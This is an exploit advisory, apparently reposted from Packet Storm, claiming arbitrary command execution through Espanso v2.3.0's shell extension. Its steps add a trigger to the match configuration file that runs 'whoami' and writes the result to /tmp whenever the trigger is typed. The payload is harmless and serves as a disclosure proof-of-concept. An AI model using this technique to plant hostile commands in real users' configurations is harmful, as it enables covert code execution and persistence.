Share
## https://sploitus.com/exploit?id=PACKETSTORM:220989
# Exploit Title: Espanso v2.3.0 - Shell Extension Arbitrary Command
Execution (RCE)
# Date: 2026-05-13
# Exploit Author: Chokri Hammedi
# Software: https://github.com/espanso/espanso/releases/tag/v2.3.0
# Vendor: https://espanso.org/
# Version: 2.3.0
# Tested on: Linux
#
# Description:
# The Shell extension in Espanso v2.3.0 allows arbitrary command execution.
# An attacker who can modify the match configuration file can inject shell
# commands that execute when the user types the trigger. No restart
required.
STEPS:
1. Edit the match file:
espanso edit
2. Add this trigger:
- trigger: ":pwn" replace: "{{output}}" vars: - name: output type: shell
params: cmd: "whoami > /tmp/whoami.txt && echo PWNED"
3. Open any text editor and type:
:pwn
4. Check result:
cat /tmp/whoami.txt
Output: user